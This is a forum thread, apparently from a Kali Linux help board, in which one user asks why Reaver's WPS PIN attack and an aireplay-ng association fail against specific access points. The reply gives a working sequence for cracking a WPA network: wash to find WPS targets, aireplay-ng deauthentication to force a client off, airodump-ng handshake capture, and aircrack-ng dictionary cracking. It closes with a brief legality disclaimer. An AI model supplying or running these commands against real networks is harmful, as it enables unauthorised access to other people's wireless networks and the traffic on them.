Reaver and Aireplay Issue with AWUS036H

[Xallam]

Hi all..

First of all my setup is a MacBookPro running OSX 10.8 with Vmware Fusion and running the latest Kali with all Updates.

The Problem is Reaver isn't working properly.

i tired

Code:

sudo reaver -i mon0 -c 1 -b D8:5D:4C:A0:99:F8 -vv

the output.

Code:

[+] Switching mon0 to channel 1
[+] Waiting for beacon from D8:5D:4C:A0:99:F8
[+] Associated with D8:5D:4C:A0:99:F8 (ESSID: TP-LINK_A099F8)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred

So the i have no idea what to do because I am new to reaver.
A friend of mine said that the wrong drivers are installed but i have no idea if they are..

The second Problem is that the aireplay handshake isnt working Properly

Once again i tried

Code:

aireplay-ng -1 0 -a 00:07:D5:01:31:2A -h 00:c0:ca:72:75:d3 -e Lancom mon0

I got
[CODE]14:58:57 Sending Authentication Request (Open System) [ACK]
14:58:57 Authentication successful
14:58:57 Sending Association Request [ACK]
14:58:57 Denied (code 1), is WPA in use ?
/CODE]

Any ideas? :/

[soxrok2212]

Hi all..

First of all my setup is a MacBookPro running OSX 10.8 with Vmware Fusion and running the latest Kali with all Updates.

The Problem is Reaver isn't working properly.

i tired

Code:

sudo reaver -i mon0 -c 1 -b D8:5D:4C:A0:99:F8 -vv

the output.

Code:

[+] Switching mon0 to channel 1
[+] Waiting for beacon from D8:5D:4C:A0:99:F8
[+] Associated with D8:5D:4C:A0:99:F8 (ESSID: TP-LINK_A099F8)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred

So the i have no idea what to do because I am new to reaver.
A friend of mine said that the wrong drivers are installed but i have no idea if they are..

What is the power level of the AP you are trying to crack? It also may be that the AP does not have WPS enabled. Run

Code:

wash -i mon0

This will show you a list of all the AP's with WPS enabled and if they have lockouts enabled.

The second Problem is that the aireplay handshake isnt working Properly

Once again i tried

Code:

aireplay-ng -1 0 -a 00:07:D5:01:31:2A -h 00:c0:ca:72:75:d3 -e Lancom mon0

I got
[CODE]14:58:57 Sending Authentication Request (Open System) [ACK]
14:58:57 Authentication successful
14:58:57 Sending Association Request [ACK]
14:58:57 Denied (code 1), is WPA in use ?
/CODE]

Any ideas? :/

Ok, I'm assuming you're trying to attack a WPA or WPA2 network. Your command,

Code:

aireplay-ng -1 0 -a 00:07:D5:01:31:2A -h 00:c0:ca:72:75:d3 -e Lancom mon0

means that you are trying to associate with the AP, which is only necessary for cracking WEP (and also WPS).
To get a handshake, you want to deauth a clent. Try running this:

Code:

aireplay-ng -0 10 -a (access point mac) -c (client mac) -e Lancom mon0

This attack means that there needs to be a client on the network that you can kick off. To see any clients connected, run

Code:

airodump-ng --bssid 00:07:D5:01:31:2A mon0 -w Lancom

You should always run that command before you try to capture a handshake.

After you get the handshake, run

Code:

aircrack-ng Lancom*.cap -w (path to your dictionary)

Here is some help from aircrack's website. http://www.aircrack-ng.org/doku.php?id=cracking_wpa

Always remember though, hacking a network that isn't yours or you don't have permission from the owner is illegal and I am not to be help responsible for what you may do with this information.